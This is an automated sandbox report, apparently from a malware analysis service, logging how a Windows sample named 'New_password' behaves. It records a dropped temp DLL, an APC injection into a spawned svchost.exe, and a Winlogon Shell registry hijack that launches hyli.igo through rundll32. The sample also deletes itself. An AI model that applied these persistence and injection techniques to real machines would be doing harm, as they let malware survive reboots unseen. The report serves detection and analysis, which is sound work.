\BaseNamedObjects\Local\Mso97SharedDg20321106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve C50000 126976 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit CC0000 401408 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit CC0000 966656 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 962560 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\SXS.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit D10000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image D10000 2904064 own pid read write conflicting addresses 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 12F0000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 1300000 618496 own pid readonly success or wait 1
\BaseNamedObjects\DfSharedHeap150FE5 query and write and read reserve 13B0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-1380330 query and write and read commit 17B0000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000150FE5 query and write and read commit 1390000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-1380356 query and write and read commit 1830000 524288 own pid read write success or wait 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 18C0000 4096 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL write and read and execute commit 18C0000 368640 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL query and write and read and execute image 10000000 372736 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve unknown unknown unknown unknown object name exists 1
C:\Program Files\Microsoft Office\OFFICE11\MSWORD.OLB query and read commit 1A50000 659456 own pid readonly success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 1B40000 4096 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19521106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve 1B80000 126976 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 1BB0000 2482176 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 1BB0000 2482176 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 1BB0000 2482176 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 1BB0000 2482176 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL write and read and execute commit 1BB0000 2482176 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL query and read commit 1BB0000 2482176 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL write and read and execute commit 1BB0000 2482176 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL query and read commit 1BB0000 2482176 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 1BB0000 2482176 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and write and read and execute image 65000000 2490368 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL write and read and execute commit 1FC0000 159744 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL query and write and read and execute image 65300000 159744 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap151A40 query and write and read reserve 2000000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-1382989 query and write and read commit 2400000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000151A40 query and write and read commit 2480000 4096 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 24D0000 98304 own pid readonly success or wait 1
C:\WINDOWS\system32\stdole2.tlb query and read commit 24F0000 16384 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2570000 40960 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and read commit 25C0000 249856 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB query and read commit 2600000 40960 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp write and read and execute commit 2660000 24576 own pid execute success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute image 2660000 49152 own pid read write conflicting addresses 1
C:\WINDOWS\system32\svchost.exe query and write and read and execute and extend size image 90000 4096 1744 execute and read and write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 2680000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 2680000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\svchost.exe write and read and execute commit 27B0000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\svchost.exe query and read commit 27B0000 16384 own pid readonly success or wait 1
C:\WINDOWS\system32\svchost.exe write and read and execute commit 27B0000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\svchost.exe query and read commit 27B0000 16384 own pid readonly success or wait 1
C:\WINDOWS\system32\svchost.exe query and read commit 2680000 16384 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute and extend size commit 10E0000 24576 own pid readonly success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 10F0000 200704 own pid execute success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 10F0000 200704 own pid readonly success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 10F0000 200704 own pid execute success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 10F0000 200704 own pid readonly success or wait 1
C:\WINDOWS\system32\oleacc.dll write and read and execute commit 10F0000 163840 own pid execute success or wait 1
C:\WINDOWS\system32\oleacc.dll query and read commit 10F0000 163840 own pid readonly success or wait 1
C:\WINDOWS\system32\oleacc.dll write and read and execute commit 10F0000 163840 own pid execute success or wait 1
C:\WINDOWS\system32\oleacc.dll query and read commit 10F0000 163840 own pid readonly success or wait 1
C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 1BA0000 1695744 own pid execute success or wait 1
C:\Program Files\Messenger\msmsgs.exe query and read commit 1BA0000 1695744 own pid readonly success or wait 1
C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 1BA0000 1695744 own pid execute success or wait 1
C:\Program Files\Messenger\msmsgs.exe query and read commit 1BA0000 1695744 own pid readonly success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 26643DD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 26643DD
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 26643DD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 26643DD
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 26643DD
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1 26643DD
unknown query and write and read and execute commit 90000 4096 1744 execute and read and write success or wait 1 2661BAD

Registry Activites
Key Path Completion Count Source Address Symbol
Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Value Modified
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell unicode Explorer.exe Explorer.exe rundll32.exe hyli.igo atkhnt success or wait 1 266287D RegSetValueExA
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell success or wait 1 266290D RegQueryValueExA

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Created
PID Filepath Cmdline Flags Completion Count Source Address Symbol
1744 C:\WINDOWS\system32\svchost.exe svchost.exe none success or wait 1 2661A6E CreateProcessA
PID Process info class Completion Count Source Address Symbol
PID Filepath Completion Count Source Address Symbol

Thread Activites
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
Thread APC Queued
TID PID Injected Path Completion Count Source Address Symbol
1076 1744 true C:\WINDOWS\system32\svchost.exe success or wait 2 2661CD2 QueueUserAPC
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol
TID PID Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:40:02 0 0 0
09:40:05 0 1 0
09:40:08 1 2 1
09:40:12 1 3 1
09:40:15 2 3 2
09:40:18 2 4 2
09:40:21 2 5 2
09:40:24 2 5 2
09:40:27 3 6 3
09:40:31 3 6 3
09:40:37 3 6 3
09:40:41 3 7 3
09:40:44 3 7 3
09:40:47 3 8 3
09:40:51 3 8 3
09:40:54 3 8 3
09:40:57 3 9 3
09:41:00 3 9 3
09:41:03 3 9 3
09:41:07 3 9 3
09:41:10 4 10 4
09:41:13 4 10 4
09:41:16 4 10 4
09:41:19 4 10 4
09:41:23 4 10 4
09:41:26 4 11 4
09:41:32 4 11 4
09:41:39 4 11 4
09:41:42 4 11 4
09:41:46 4 11 4
09:41:49 4 12 4
09:41:52 4 12 4
09:41:57 3 10 3

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window name Class name HWND Completion Count Source Address Symbol
Window name Class name HWND of window Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
HWND Command Completion Count Source Address Symbol
HWND Command Completion Count Source Address Symbol
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 956641069
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 956641899
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 957168233
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 957169735
Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 958008510
Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 958011634
Section loaded Path: unknown Access: query and write and read and execute Type: commit Baseaddress: 90000 Size: 4096 Protection: execute and read and write Mapped to pid: 1744 success or wait 961673549
Process created PID: 1744 Path: C:\WINDOWS\system32\svchost.exe Cmdline: svchost.exe Createflags: none success or wait 968352187
Thread apc queued TID: 1076 PID: 1744 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: true success or wait 978196064
Thread apc queued TID: 1076 PID: 1744 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: true success or wait 978197418
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 978199532
File created Path: C:\WINDOWS\system32\hyli.igo Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true success or wait 978200749
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Name: Shell success or wait 978646908
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Name: Shell Type: unicode Data: Explorer.exe rundll32.exe hyli.igo atkhnt Old data: Explorer.exe success or wait 978762882

Analysis File: svchost.exe PID: 1744 Parent PID: 1680

General
Start time: 09:41:50
Start date: 24/01/2012
Path: C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit): false
Commandline: svchost.exe
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Deleted
File Path Completion Count Source Address Symbol
C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1 100011F9 DeleteFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1C0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 230000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 280000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 290000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3D0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3D0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3E0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8C0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8C0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 8D0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 8D0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 8E0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp write and read and execute commit 8C0000 24576 own pid execute success or wait 1 90061
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute image 10000000 49152 own pid read write success or wait 1 90061
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 100043DD
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 100043DD
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1 100043DD

Registry Activites
Key Created
Key Path Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid success or wait 1 1000280C RegCreateKeyExA
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid op object name not found 1 1000290D RegQueryValueExA
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid url1 object name not found 1 1000290D RegQueryValueExA

Mutex Activites
Mutex Created
Name Completion Count Source Address Symbol
\BaseNamedObjects\3408630516cb2b92f4 success or wait 1 10001057 CreateMutexA

Process Activites
PID Process info class Completion Count Source Address Symbol

Thread Activites
Thread Delayed
TID Delay Completion Count Source Address Symbol
1076 -10s success or wait 1 100011C7 Sleep
1076 -900s unknown 1 100018E2 Sleep

Memory Activites
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:41:54 0 0 0
09:41:58 0 1 0
09:42:01 0 1 0
09:42:04 0 2 0
09:42:14 1 2 1
09:42:16 1 3 1

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 24576 Protection: execute Mapped to pid: own pid success or wait 1009405351
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 1009518570
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 1011281963
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1011283989
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 1011810740
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1011814975
Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 1012655087
Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 1012658009
Thread delayed Time: -10 TID: 1076 success or wait 1016257777
File deleted Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe New path: Disposition: Data : success or wait 1052028774
Mutant created Name: \BaseNamedObjects\3408630516cb2b92f4 success or wait 1052031119
Key created Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid success or wait 1052032524
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid Name: op object name not found 1052041264
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid Name: url1 object name not found 1052113159
Thread delayed Time: -900 TID: 1076 unknown 1060250510